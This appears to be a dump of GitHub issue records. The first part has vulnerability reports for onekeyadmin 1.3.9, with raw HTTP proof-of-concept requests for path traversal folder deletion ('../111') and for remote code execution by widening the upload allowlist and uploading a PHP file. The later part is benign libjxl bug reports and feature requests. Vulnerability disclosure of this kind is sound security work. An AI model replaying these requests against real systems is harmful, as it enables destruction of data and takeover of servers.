Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.3.129:8091/admin1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=0f1ac62d78a3647890cbd8acd3d458b7
Connection: close
Content-Length: 17
Content-Type: application/json

{"name":"../111"}
```
<img width="992" alt="image" src="https://user-images.githubusercontent.com/122217858/211448297-9356a5d9-069c-4417-a777-828415fb1473.png">
| Background arbitrary folder deletion vulnerability | https://api.github.com/repos/keheying/onekeyadmin/issues/3/comments | 1 | 2023-01-10T02:29:40Z | 2023-03-20T02:15:29Z | https://github.com/keheying/onekeyadmin/issues/3 | 1,526,660,136 | 3 |
[
"keheying",
"onekeyadmin"
] | Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:file delete
Vulnerability Details:
Background arbitrary folder deletion 1 vulnerability
Vulnerability location
Vulnerability occurs in
app\admin\controller\Themes#delete method
<img width="973" alt="image" src="https://user-images.githubusercontent.com/122217858/211447839-520b03ef-527a-4f2a-8a25-fbd267a5e901.png">
Here the `delDirAndFile` method of `onekey\File` is called:
<img width="976" alt="image" src="https://user-images.githubusercontent.com/122217858/211447867-069f38f3-b768-419f-acd4-a0f343cb6f7e.png">
You can see that if the input is a directory, it first traverses and deletes the files inside the directory, then deletes the directory itself.
Vulnerability recurrence
Next I will delete the E:\onekeyadmin-main\public\111\ directory
```
POST /admin1/themes/delete HTTP/1.1
Host: 192.168.3.129:8091
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.3.129:8091/admin1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=0f1ac62d78a3647890cbd8acd3d458b7
Connection: close
Content-Length: 17
Content-Type: application/json

{"name":"../111"}
```
<img width="982" alt="image" src="https://user-images.githubusercontent.com/122217858/211447932-e36855fd-9b1c-4ce6-9cbd-8febe9c0eed8.png">
| Background arbitrary folder deletion 1 vulnerability | https://api.github.com/repos/keheying/onekeyadmin/issues/2/comments | 0 | 2023-01-10T02:26:58Z | 2023-02-15T05:49:55Z | https://github.com/keheying/onekeyadmin/issues/2 | 1,526,658,134 | 2 |
[
"keheying",
"onekeyadmin"
] | Vulnerability affects product:onekeyadmin
Vulnerability affects version 1.3.9
Vulnerability type:Remote code execution
Vulnerability Details:
Remote code execution caused by uploading arbitrary files in the background
Vulnerability location
The vulnerability occurs in app\admin\controller\File#upload. Although there are restrictions on the allowed extensions (ext),
<img width="976" alt="image" src="https://user-images.githubusercontent.com/122217858/211447414-69a5d85f-5041-4cf2-8313-704b2167ca3f.png">
we found that the app\admin\controller\Config#update method can update these limits
<img width="974" alt="image" src="https://user-images.githubusercontent.com/122217858/211447538-8355f2c7-0c7c-47ba-aaf8-495e15e4e545.png">
<img width="980" alt="image" src="https://user-images.githubusercontent.com/122217858/211447550-6c26d381-7e9a-4b4a-9ada-9d217533f409.png">
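As an aside (not from the report — the names here are made up for illustration), this is why an extension allowlist gives no protection once the attacker can rewrite the allowlist itself:

```python
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}  # server-side "upload limit" config

def upload_allowed(filename: str, allowed=ALLOWED_EXT) -> bool:
    # Same shape of check as a typical ext allowlist: compare the final extension.
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in allowed

print(upload_allowed("shell.php"))  # blocked while the config is intact
# The Config#update endpoint lets an admin rewrite the allowlist, so the
# attacker simply adds "php" first -- exactly what the PoC below does:
ALLOWED_EXT.add("php")
print(upload_allowed("shell.php"))  # now permitted
```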
Vulnerability reproduction
Precondition: admin privileges
poc
The first step is to update the configuration to allow uploading php files
`POST /admin1/config/update HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 398
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/config/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: .AspNetCore.Antiforgery.WE9Ryc20IQg=CfDJ8HxjCh0oOylDk40Utlg0kuUFWVLtvNW_C4pGl8LD435wIbnnMrZdOHOVRm58Tf9ea-RLT8Cp1rFj-RWlZ5XrTw9-pVKvbqtZLLUaL1326gsyfJyfQ4k6KDwnwVkIpwADhj_KGa_UpcDu8IqL7EsVtWw; .AspNetCore.Session=CfDJ8HxjCh0oOylDk40Utlg0kuXb68MZjsW%2FxifhC6RHBoXE9qf6bZAULAztKWrxdQ9IBGV%2FMomSXYW%2BGJr9gVN1G67kZ5ZHUvzZTEMIYQoRouYf9upg6F4i%2BhutGrGde7h3SIdWEXSN5b50ouWrN9AG8MmS%2FGz8y0InZBJWSgEn5O55; .AspNetCore.Cookies=CfDJ8HxjCh0oOylDk40Utlg0kuXw6Bar2FloCPnRmIK8z27i1l1eQZE9H20ZfZqx9xSA5gVSrZS5hfpqeu4tILEhHunDaAOIqfEmmxsRNV2SMHnwXt_-X0kdVf67A8e1MWMxP-p-tuJZSsa7zVQwOFqTVBFHpgk2dGT3N2U0Th0WR3lQUMdM42wC-XbWYchKNG_fiMCNOPg2MXOFaBmuPreHzuI2wxc-a8KiA7afrdzzz4BnurbEbl8aR8DL0WYq8jFHxZdo1RwJwXULO2qvHYIQzgjZvELBShr4j8C6FJ82VBL5Gq3zFSHAJZ0ddy2q9M0cLUVM4alP8kmxfwfeaVHMZR1cS3_WwDQz5hvGNQuVwIijYdb4HUUpYTKZh2hs_j-o0joMSDe7mdS_3rTvyQ5errD_GkyZZnZL7qZ2jydHhlZMa2vPLOHmLFan6WXhtTk0E_1-zYB117H7tFTA_jJGaNrPVYEuQmmSuBf3kwlWwV1TfGQYL7dPbZDscJdMhn34YnL3LvBlWmY6wRO1ZkZrLmRSsIzcWL7PKHaELAXf8VHz; PHPSESSID=c54fdf181caff75fbd613da826c6e9ae
Connection: close
{"title":"上传限制","name":"upload","value":{"admin":{"ext":{"image":"png,jpg,jpeg,bmp,gif,ico","video":"mp4","audio":"mp3","word":"docx,doc","other":"swf,psd,css,js,html,exe,dll,zip,rar,ppt,pdf,xlsx,xls,txt,torrent,dwt,sql,svg,php"},"size":{"image":10485760,"video":104857600,"audio":104857600,"other":104857600,"word":104857600}},"index":{"ext":{"image":"png,jpg"},"size":{"image":2097152}}}}`
<img width="980" alt="image" src="https://user-images.githubusercontent.com/122217858/211447647-7117f5e5-30ef-4b7e-a730-02e0c5862a2d.png">
The second step is to upload malicious files
`POST /admin1/file/upload HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 280
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryARP8fRC2kb4GP3oP
Accept: */*
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/file/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:PHPSESSID=c54fdf181caff75fbd613da826c6e9ae
Connection: close
------WebKitFormBoundaryARP8fRC2kb4GP3oP
Content-Disposition: form-data; name="name"
templatex
------WebKitFormBoundaryARP8fRC2kb4GP3oP
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: text/php
<?php phpinfo();?>
------WebKitFormBoundaryARP8fRC2kb4GP3oP--
`
<img width="961" alt="image" src="https://user-images.githubusercontent.com/122217858/211447704-42a1446e-adf1-4332-8359-248bbc28d2ae.png">
<img width="984" alt="image" src="https://user-images.githubusercontent.com/122217858/211447729-9965e8e7-fe26-4612-96f9-d222eead2a79.png">
| Remote code execution caused by uploading arbitrary files in the background | https://api.github.com/repos/keheying/onekeyadmin/issues/1/comments | 1 | 2023-01-10T02:25:19Z | 2023-03-20T02:13:00Z | https://github.com/keheying/onekeyadmin/issues/1 | 1,526,656,884 | 1 |
[
"libjxl",
"libjxl"
] | `libjpeg` and also `libwebp` support a so-called shrink factor. This is especially useful when creating thumbnails of images as it can speed things up quite significantly. From the `libjpeg` documentation:
```
unsigned int scale_num, scale_denom
Scale the image by the fraction scale_num/scale_denom. Default is
1/1, or no scaling. Currently, the only supported scaling ratios
are M/8 with all M from 1 to 16, or any reduced fraction thereof (such
as 1/2, 3/4, etc.)
```
From my understanding this can speed things up so much because it **A)** doesn't need to decode the whole image and **B)** can skip parts of a slower resize operation. For lack of a better reference: https://github.com/libvips/libvips/discussions/2821#discussioncomment-2814406
> libjpeg will only decode enough of the coefficients to generate an image of that size. 8x shrink is especially quick since it just needs to fetch the DC coefficient of each DCT block
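To make the M/8 ratios concrete, here is a rough Python sketch (not libjpeg's actual code; the round-up behavior mirrors how libjpeg computes output dimensions, but treat it as an assumption) of picking a supported scale and the resulting output size:

```python
from fractions import Fraction
from math import ceil

def closest_libjpeg_scale(requested: Fraction) -> Fraction:
    """Pick the libjpeg-supported ratio M/8 (M = 1..16) closest to `requested`,
    rounding up so the decoded image is never smaller than asked for."""
    candidates = [Fraction(m, 8) for m in range(1, 17)]
    at_least = [c for c in candidates if c >= requested]
    return min(at_least) if at_least else max(candidates)

def scaled_size(w: int, h: int, scale: Fraction) -> tuple:
    # Assumption: scaled dimensions round up, as libjpeg does.
    return (ceil(w * scale), ceil(h * scale))

scale = closest_libjpeg_scale(Fraction(1, 8))   # the `--shrink 8` case
print(scale, scaled_size(64000, 64000, scale))  # 1/8 (8000, 8000)
```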
For example with [libvips](https://github.com/libvips/libvips):
```
vips black test.jpg 64000 64000
# lossless transcode to JXL
cjxl test.jpg test.jxl
# resize JPEG to 8000x8000 with shrink-on-load
time vips --vips-concurrency=1 jpegload --shrink 8 test.jpg out.jpg
0.99s user 0.03s system 100% cpu 1.016 total
# resize JXL to 8000x8000
time vips --vips-concurrency=1 resize test.jxl out.jpg 0.125
18.46s user 0.50s system 100% cpu 18.907 total
```
You can see that the shrink-on-load feature can make resizing quite a bit faster. Does something similar exist in the JXL API? | shrink-on-load feature | https://api.github.com/repos/libjxl/libjxl/issues/4297/comments | 3 | 2025-06-18T19:39:49Z | 2025-06-21T02:09:34Z | https://github.com/libjxl/libjxl/issues/4297 | 3,157,974,950 | 4,297 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
Compressing and decompressing a PNG with cjxl and djxl changes the value of a pixel.
**To Reproduce**
```sh
git clone https://github.com/libjxl/libjxl.git # Fails at v0.11.1 and at head (0102eef)
cd libjxl
./deps.sh
cmake -S . -B build -DBUILD_TESTING=OFF -DJPEGXL_ENABLE_BENCHMARK=OFF -DJPEGXL_ENABLE_EXAMPLES=OFF -DJPEGXL_ENABLE_OPENEXR=OFF -DJPEGXL_ENABLE_DEVTOOLS=ON -DJPEGXL_ENABLE_JPEGLI=ON -DJPEGXL_ENABLE_JPEGLI_LIBJPEG=OFF -DCMAKE_BUILD_TYPE=Release -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DBUILD_SHARED_LIBS=ON
cmake --build build --parallel
build/tools/cjxl emoji_u1f468_1f3fb_200d_1f373.png -q 100 -e 1 enc.jxl
build/tools/djxl enc.jxl dec.png
compare emoji_u1f468_1f3fb_200d_1f373.png dec.png diff.png
```
Source `emoji_u1f468_1f3fb_200d_1f373.png`:

`diff.png`:

**Environment**
- OS: linux
- Compiler version: clang 19.1.7
- CPU type: x64
- cjxl/djxl version string: v0.12.0 0102eef5 [_AVX2_,SSE4,SSE2] | cjxl -q 100 -e 1 is lossy | https://api.github.com/repos/libjxl/libjxl/issues/4287/comments | 3 | 2025-06-13T11:10:28Z | 2025-06-16T15:23:23Z | https://github.com/libjxl/libjxl/issues/4287 | 3,143,220,623 | 4,287 |
[
"libjxl",
"libjxl"
] | I'm encoding a bayer pattern CFA using jxl via tifffile. For lossless encoding I get decent results, but for anything lossy I very quickly see artifacts. Attached is an image at .25 strength. I'm guessing that CFAs are just treated as grayscale images in JXL vs. having specific support. Is this correct?
 | CFAs and jxl | https://api.github.com/repos/libjxl/libjxl/issues/4282/comments | 13 | 2025-06-11T03:07:09Z | 2025-06-18T16:05:22Z | https://github.com/libjxl/libjxl/issues/4282 | 3,135,338,001 | 4,282 |
[
"libjxl",
"libjxl"
I tried to build libjxl but encountered a problem: skcms from googlesource cannot be accessed. How can I solve it?
```
Cloning into '/libjxl/third_party/skcms'...
fatal: unable to access 'https://skia.googlesource.com/skcms/': The requested URL returned error: 429
fatal: clone of 'https://skia.googlesource.com/skcms' into submodule path '/libjxl/third_party/skcms' failed
```
The error code is 429, but no solution worked even after retries. | skcms cannot be accessed | https://api.github.com/repos/libjxl/libjxl/issues/4280/comments | 3 | 2025-06-10T02:36:32Z | 2025-06-20T11:03:51Z | https://github.com/libjxl/libjxl/issues/4280 | 3,131,962,578 | 4,280 |
[
"libjxl",
"libjxl"
] | For some images, the data reported by jxlinfo may be a little confusing, particularly for occasional users of this handy tool.
If you encode a 32-bit image to JXL in Photoshop with ProPhoto primaries, the following is reported by jxlinfo:
```
JPEG XL file format container (ISO/IEC 18181-2)
JPEG XL image, 1000x1250, lossy, 32-bit float (8 exponent bits) RGB+Alpha
Color space: RGB, Custom, white_point(x=0.345705,y=0.358541), Custom primaries: red(x=0.734700,y=0.265300), green(x=0.159601,y=0.840398), blue(x=0.036598,y=0.000100)Linear transfer function, rendering intent: Relative
```
The "color space:" line is a bit confusing here.
Suggestions for clarity:
- **Show common language representation of major spaces like Adobe RGB and ProPhoto.**
- What does "**Custom**" refer to? I presume the white point - but it isn't clear, especially with the comma separating it from the other values. The following "custom primaries:" more clearly connects to the actual x,y data. If this is white point, probably better to show "Custom white point: x=0.345705,y=0.358541"
- Break the output to **multiple lines** (separate white point from primaries, etc)
- There is **no break/space** before "Linear transfer..." | jxlinfo output may be confusing | https://api.github.com/repos/libjxl/libjxl/issues/4270/comments | 2 | 2025-05-23T15:26:22Z | 2025-06-03T19:19:11Z | https://github.com/libjxl/libjxl/issues/4270 | 3,086,751,109 | 4,270 |
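As a sketch of the first suggestion, a small lookup table could map custom primaries back to a well-known space. This is illustrative Python, not jxlinfo code; the tolerance and table entries are assumptions:

```python
KNOWN_PRIMARIES = {
    # (red, green, blue) chromaticities, rounded to 4 decimals
    "ProPhoto RGB": ((0.7347, 0.2653), (0.1596, 0.8404), (0.0366, 0.0001)),
    "Adobe RGB":    ((0.6400, 0.3300), (0.2100, 0.7100), (0.1500, 0.0600)),
    "sRGB":         ((0.6400, 0.3300), (0.3000, 0.6000), (0.1500, 0.0600)),
}

def name_primaries(red, green, blue, tol=1e-3):
    # Compare all six chromaticity coordinates against each known space.
    for name, prim in KNOWN_PRIMARIES.items():
        if all(abs(a - b) <= tol
               for got, want in zip((red, green, blue), prim)
               for a, b in zip(got, want)):
            return name
    return "Custom"

# The primaries from the jxlinfo output above match ProPhoto:
print(name_primaries((0.734700, 0.265300), (0.159601, 0.840398), (0.036598, 0.000100)))
```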
[
"libjxl",
"libjxl"
] | **Describe the bug**
jxlinfo reports a transcoded JPEG as "(possibly) lossless" even though "JPEG bitstream reconstruction data available" is shown - but because cjxl never transcodes JPEGs lossily, in this case there should be nothing "possibly" about it.
Either a transcoded JPEG should be labeled "lossy" (because the source image was lossy) or "lossless" (because it's a lossless transcode) - or maybe something else like "transcoded".
**To Reproduce**
cjxl test.jpg test.jxl
jxlinfo test.jxl
```
JPEG XL file format container (ISO/IEC 18181-2)
JPEG XL image, 1920x1080, (possibly) lossless, 8-bit RGB
Color space: RGB, D65, sRGB primaries, sRGB transfer function, rendering intent: Relative
JPEG bitstream reconstruction data available
```
**Environment**
- OS: Windows
- Compiler version: clang 20.1.5
- CPU type: x86_64
- cjxl/djxl version string: JPEG XL encoder v0.12.0 34102f07 [_AVX3_ZEN4_,AVX3_DL]
| jxlinfo returns "(possibly) lossless" even if "JPEG bitstream reconstruction data available" | https://api.github.com/repos/libjxl/libjxl/issues/4254/comments | 10 | 2025-05-18T22:06:25Z | 2025-05-22T09:08:33Z | https://github.com/libjxl/libjxl/issues/4254 | 3,072,090,933 | 4,254 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
I wrote a small program that encodes a JXL image using libjxl (via [CImg](https://www.cimg.eu/)). While libjxl can successfully decode the image, jxl-oxide cannot, and it appears that the image is not encoded correctly.
Original jxl-oxide issue: https://github.com/tirr-c/jxl-oxide/issues/456
**To Reproduce**
Steps to reproduce the behavior:
I've made a minimal reproduction here: https://github.com/printfn/repro/tree/cimg-libjxl-spheres
1. (Optional) Run `make` and `./repro` to run the program, which encodes the `spheres.jxl` file (depending on your system you may need to adjust paths in the `Makefile`)
2. Decoding [`spheres.jxl`](https://github.com/printfn/repro/blob/cimg-libjxl-spheres/spheres.jxl) succeeds with `djxl`, but fails with `jxl-oxide`
The initial investigation at https://github.com/tirr-c/jxl-oxide/issues/456 seems to indicate that libjxl is incorrectly setting `modular_16bit_buffers` despite samples being outside the 16-bit range.
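To spell out the invariant at issue (hedged — this is an illustrative Python sketch, and the exact bounds libjxl uses may differ): 16-bit modular buffers can only hold samples in a limited integer range, so the encoder must check all samples before setting `modular_16bit_buffers`:

```python
def fits_16bit_buffers(samples, lo=-(1 << 15), hi=(1 << 15) - 1) -> bool:
    """True if every (integer) sample fits the 16-bit buffer range.

    The bounds are illustrative; the point is that this must be verified
    over *all* samples before modular_16bit_buffers is set."""
    return all(lo <= s <= hi for s in samples)

print(fits_16bit_buffers([0, 255, 32767]))  # True: 16-bit buffers are fine
print(fits_16bit_buffers([0, 1 << 20]))     # False: needs wider buffers
```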
**Expected behavior**
It looks like there might be two issues:
* libjxl should have encoded the image such that it can be decoded by jxl-oxide
* libjxl should have refused to decode the image
**Screenshots**
N/A
**Environment**
- OS: macOS
- Compiler version: Apple clang version 17.0.0
- CPU type: aarch64
- cjxl/djxl version string: cjxl v0.11.1 0.11.1 [NEON]
I have also reproduced this on aarch64 Linux.
**Additional context**
The code in CImg.h is a bit strange in that it tries to encode losslessly by setting the distance to zero, but doesn't call `JxlEncoderSetFrameLossless`. But reading the documentation I don't think calling `JxlEncoderSetFrameLossless` is required; the bug seems to be unrelated to whether the image is lossless or not.
<!--
Currently github does not allow uploading files that end in `.jxl`, but when you
rename them for example as `image.jxl.jpg`, it will be possible to upload them
and also view them in browsers that are configured to support it.
See https://github.com/orgs/github-community/discussions/18139
-->
| libjxl image cannot be decoded with jxl-oxide, `modular_16bit_buffers` seems to be incorrectly set | https://api.github.com/repos/libjxl/libjxl/issues/4234/comments | 1 | 2025-05-06T20:12:36Z | 2025-05-09T14:39:17Z | https://github.com/libjxl/libjxl/issues/4234 | 3,043,899,149 | 4,234 |
[
"libjxl",
"libjxl"
] | Hello JPEG XL folks,
Current image formats are focused on 2D images, they have a width and a height. However, there are many use cases where volumetric 3D content is required. This is common in many fields including computer graphics (ex: sampling in 3D or time-evolving 2D), data visualization, neuroscience (NIfTI), medical scans (DICOM for CT/MRI scans), and more. There are even use cases for 4D or higher textures (ex: time-evolving 3D).
Currently, most formats used to store 3D image data, such as neuroscience formats and KTX, operate by storing many layers of 2D images. This neglects optimization opportunities between multiple layers. 3D images require massive amounts of space compared to 2D images, therefore saving space is extremely important.
What I am searching for is an image format that can directly encode multi-dimensional images in an efficient manner, not layers of 2D images. Effectively, a single blob of data similar to JPEG XL, AVIF, WebP, PNG, JPEG, etc.
I can see that Part 10 of the JPEG 2000 standard allows for encoding of volumetric 3D image data. Here is a link to a research paper that explains this and explains the use cases for it: https://www.researchgate.net/publication/221376499_JPEG2000_Part_10_-_Volumetric_data_encoding
Would JPEG XL folks be interested in adding this JPEG 2000 feature to JPEG XL? Since JPEG XL can encode better than JPEG 2000, I'm sure that the JPEG XL team could come up with a better format if there was motivation to do this. Also, even if JPEG 2000 Part 10 can already encode 3D images, there is still the case of 4D images, 5D images, and so on, so the JPEG XL feature could be better by being multi-dimensional.
Thanks,
Aaron Franke
| Multi-dimensional JPEG XL like JPEG 2000 Part 10 | https://api.github.com/repos/libjxl/libjxl/issues/4222/comments | 5 | 2025-04-30T23:39:07Z | 2025-05-02T20:09:53Z | https://github.com/libjxl/libjxl/issues/4222 | 3,032,806,791 | 4,222 |
[
"libjxl",
"libjxl"
] | Hello,
Sorry, I couldn't find this in the docs or elsewhere, but could you direct me towards simple code showing how to encode a multiframe image so that its frames are not accumulated in memory but are sent, encoded, to the output as encoding progresses? This question comes under a (maybe wrong) assumption that all frames are indeed accumulated in memory, and a concern about memory footprint.
Currently I encode a multiframe image like this:
```
for (allframes) JxlEncoderAddImageFrame
JxlEncoderCloseInput
JxlEncoderProcessOutput
```
I wonder if there is a mechanism similar to JxlEncoderProcessOutput that can be invoked during/between calls to JxlEncoderAddImageFrame
Thank you | saving: how to process outputs while adding more frames? | https://api.github.com/repos/libjxl/libjxl/issues/4217/comments | 2 | 2025-04-29T10:30:54Z | 2025-04-29T20:21:30Z | https://github.com/libjxl/libjxl/issues/4217 | 3,027,829,709 | 4,217 |
[
"libjxl",
"libjxl"
] | 
PNG: 21033 bytes
JXL: 21695 bytes (compression level 11 that no one will ever use; JXL 0.11.1)
WEBP: 16094 bytes | Worse than PNG? | https://api.github.com/repos/libjxl/libjxl/issues/4212/comments | 9 | 2025-04-27T20:05:16Z | 2025-06-19T21:03:16Z | https://github.com/libjxl/libjxl/issues/4212 | 3,023,294,727 | 4,212 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
I am converting a bunch of JPEGs to JXL, then copying the metadata with ExifTool.
When the file is read with a ffmpeg based decoder (mpv/ffplay), there is an error while decoding:
```
[ffmpeg/video] libjxl: Unknown libjxl decode error
Error while decoding frame!
```
imlib2 decoder like feh has no error.
**To Reproduce**
Steps to reproduce the behavior:
`cjxl --distance 0.0 --effort 7 --progressive --brotli_effort 9 --lossless_jpeg 1 blah.jpg blah.jxl`
`exiftool -m -TagsFromFile blah.jpg blah.jxl`
The problem also occurs when adding tags on a new file:
`exiftool -m -Artist='Pat' blah.jxl`
`mpv --loop-playlist=inf --image-display-duration=5 blah.jxl`
**Expected behavior**
The file should play without any error.
**Screenshots**
If applicable, add screenshots or example input/output images to help explain your problem.
**Environment**
- OS: Fedora Linux 42
- Compiler version: gcc (GCC) 15.0.1 20250329 (Red Hat 15.0.1-0)
- CPU type: x86_64
- cjxl/djxl version string: JPEG XL encoder v0.11.1 [AVX2,SSE4,SSE2]
- exiftool: 13.10
- ffmpeg: ffmpeg version 7.1.1 Copyright (c) 2000-2025 the FFmpeg developers
**Additional context**
I am not sure from where the issue comes from:
- libjxl
- exiftool
- or ffmpeg
Since the file is decoded correctly with imlib2, maybe the issue is in ffmpeg? Or ffmpeg is adhering more strictly to the spec, while imlib2 is more lax, and the problem is really in exiftool? | "Corruped" JXL file after copying/adding metadata with Exiftool, but only when read with ffmpeg | https://api.github.com/repos/libjxl/libjxl/issues/4211/comments | 4 | 2025-04-27T05:48:05Z | 2025-06-22T09:40:04Z | https://github.com/libjxl/libjxl/issues/4211 | 3,022,798,198 | 4,211 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
Running on `main` among other output I got error that NC013_Evening_AdobeRGB_16bit.ppm is failed to decode.
**To Reproduce**
Steps to reproduce the behavior: run `./ci.sh benchmark`
**Expected behavior**
No error.
**Screenshots**
Relevant log part:
```
./lib/extras/dec/color_description.cc:106: JXL_FAILURE: Invalid double: Ado
./lib/extras/dec/color_description.cc:165: JXL_RETURN_IF_ERROR code=1: ParseDouble(&xy_tokenizer, c->primaries_red_xy + 0)
./lib/extras/dec/color_description.cc:240: JXL_RETURN_IF_ERROR code=1: ParsePrimaries(&tokenizer, c)
./lib/extras/dec/color_hints.cc:37: JXL_FAILURE: Failed to apply color_space
./lib/extras/dec/color_hints.h:44: JXL_FAILURE: ColorHints::Foreach returned false
./lib/extras/dec/color_hints.cc:27: JXL_RETURN_IF_ERROR code=1: color_hints.Foreach( [color_already_set, is_gray, ppf, &got_color_space]( const std::string& key, const std::string& value) -> Status { if (color_already_set && (key == "color_space" || key == "icc")) { JXL_WARNING("Decoder ignoring %s hint", key.c_str()); return true; } if (key == "color_space") { JxlColorEncoding c_original_external; if (!ParseDescription(value, &c_original_external)) { return JXL_FAILURE("Failed to apply color_space"); } ppf->color_encoding = c_original_external; if (is_gray != (ppf->color_encoding.color_space == JXL_COLOR_SPACE_GRAY)) { return JXL_FAILURE("mismatch between file and color_space hint"); } got_color_space = true; } else if (key == "icc") { const uint8_t* data = reinterpret_cast<const uint8_t*>(value.data()); std::vector<uint8_t> icc(data, data + value.size()); ppf->icc = std::move(icc); ppf->primary_color_representation = PackedPixelFile::kIccIsPrimary; got_color_space = true; } else if (key == "exif") { const uint8_t* data = reinterpret_cast<const uint8_t*>(value.data()); std::vector<uint8_t> blob(data, data + value.size()); ppf->metadata.exif = std::move(blob); } else if (key == "xmp") { const uint8_t* data = reinterpret_cast<const uint8_t*>(value.data()); std::vector<uint8_t> blob(data, data + value.size()); ppf->metadata.xmp = std::move(blob); } else if (key == "jumbf") { const uint8_t* data = reinterpret_cast<const uint8_t*>(value.data()); std::vector<uint8_t> blob(data, data + value.size()); ppf->metadata.jumbf = std::move(blob); } else { JXL_WARNING("Ignoring %s hint", key.c_str()); } return true; })
./lib/extras/dec/pnm.cc:465: JXL_RETURN_IF_ERROR code=1: ApplyColorHints(color_hints, false, header.is_gray, ppf)
./lib/extras/dec/decode.cc:164: JXL_FAILURE: Codecs failed to decode
Failed to decode /tmp/tmp.4hFRoxP6RF/adobe16/NC013_Evening_AdobeRGB_16bit.ppm
```
**Environment**
- OS: Ubuntu 24.04 x64
- Compiler version: GCC 11-14, Clang 18-20
- CPU type: x86_64
- version string: benchmark_xl v0.12.0 7921d602 [_AVX2_,SSE4,SSE2] | Failure in benchmark | https://api.github.com/repos/libjxl/libjxl/issues/4187/comments | 0 | 2025-04-13T19:37:28Z | 2025-04-18T08:39:28Z | https://github.com/libjxl/libjxl/issues/4187 | 2,991,440,689 | 4,187 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
The attached image takes an infinite amount of time to compress at compression level 11
**To Reproduce**
Steps to reproduce the behavior: compress losslessly at level 11
**Environment**
- OS: 32bit
- Compiler version: N/A
- CPU type: Any x86 CPU
- cjxl/djxl version string: 0.11.1
 | A tiny image takes an infinite amount of time to compress at compression level 11 | https://api.github.com/repos/libjxl/libjxl/issues/4186/comments | 3 | 2025-04-12T14:29:02Z | 2025-04-15T02:26:59Z | https://github.com/libjxl/libjxl/issues/4186 | 2,990,502,372 | 4,186 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
EXIF rotation doesn't seem to work for https://tinystash.undef.im/il/5yEGgbmBcRbbreTQ29RRAPtMZz5MTB72cwMvMdTGu2AobkSbjmEHm7XeCHBpi3tUkce1pVeCpd9SwdyeNtAqzzvh.jxl
The jxl file has the rotation tag but it doesn't seem to apply by neither djxl, nsxiv and sxiv (not sure if really related). The same tags work when `exiftool -tagsFromFile` for a jpeg and fed to nsxiv/sxiv.
**To Reproduce**
`djxl 5yEGgbmBcRbbreTQ29RRAPtMZz5MTB72cwMvMdTGu2AobkSbjmEHm7XeCHBpi3tUkce1pVeCpd9SwdyeNtAqzzvh.jxl 5yEGgbmBcRbbreTQ29RRAPtMZz5MTB72cwMvMdTGu2AobkSbjmEHm7XeCHBpi3tUkce1pVeCpd9SwdyeNtAqzzvh.png`
Then `exiftool` says the decoded image is `Horizontal (normal)`.
**Expected behavior**
Either the image being rotated during decoding, or the EXIF orientation tag being preserved.
**Environment**
- OS: Gentoo Lignux
- Compiler version: gcc (Gentoo Hardened 14.2.1_p20250301 p8) 14.2.1 20250301
- CPU type: amd64
- cjxl/djxl version string: djxl v0.11.1 [AVX2]
| EXIF rotation is wonky | https://api.github.com/repos/libjxl/libjxl/issues/4182/comments | 2 | 2025-04-09T14:16:26Z | 2025-04-18T15:30:59Z | https://github.com/libjxl/libjxl/issues/4182 | 2,982,979,512 | 4,182 |
[
"libjxl",
"libjxl"
] | null | Add option to preserve timestamp from source file | https://api.github.com/repos/libjxl/libjxl/issues/4181/comments | 1 | 2025-04-06T12:43:54Z | 2025-04-09T18:15:49Z | https://github.com/libjxl/libjxl/issues/4181 | 2,974,932,658 | 4,181 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
The WASM oneshot encoder runs out of memory trying to encode the test.pfm example in the demo script
**To Reproduce**
Build WASM with:
```
BUILD_TARGET=wasm32 SKIP_TEST=1 emconfigure ./ci.sh release
```
Try a test encode with:
```
echo -e -n "PF\n1 1\n-1.0\n\0\0\x80\x3f\0\0\x80\x3f\0\0\x80\x3f" > test.pfm
node build-wasm32/encode_oneshot.js test.pfm test.jxl
```
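In case the `echo -e -n` one-liner behaves differently across shells, an equivalent Python writer for the same 1x1 PFM (little-endian, scale -1.0, matching the bytes in the command) is:

```python
import struct

def write_1x1_pfm(path: str, r: float = 1.0, g: float = 1.0, b: float = 1.0) -> None:
    # "PF" = color PFM; a negative scale means little-endian float32 samples.
    header = b"PF\n1 1\n-1.0\n"
    with open(path, "wb") as f:
        f.write(header + struct.pack("<3f", r, g, b))

write_1x1_pfm("test.pfm")  # same bytes as the echo command above for (1,1,1)
```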
**Expected behavior**
Encodes to JXL file
**Screenshots**
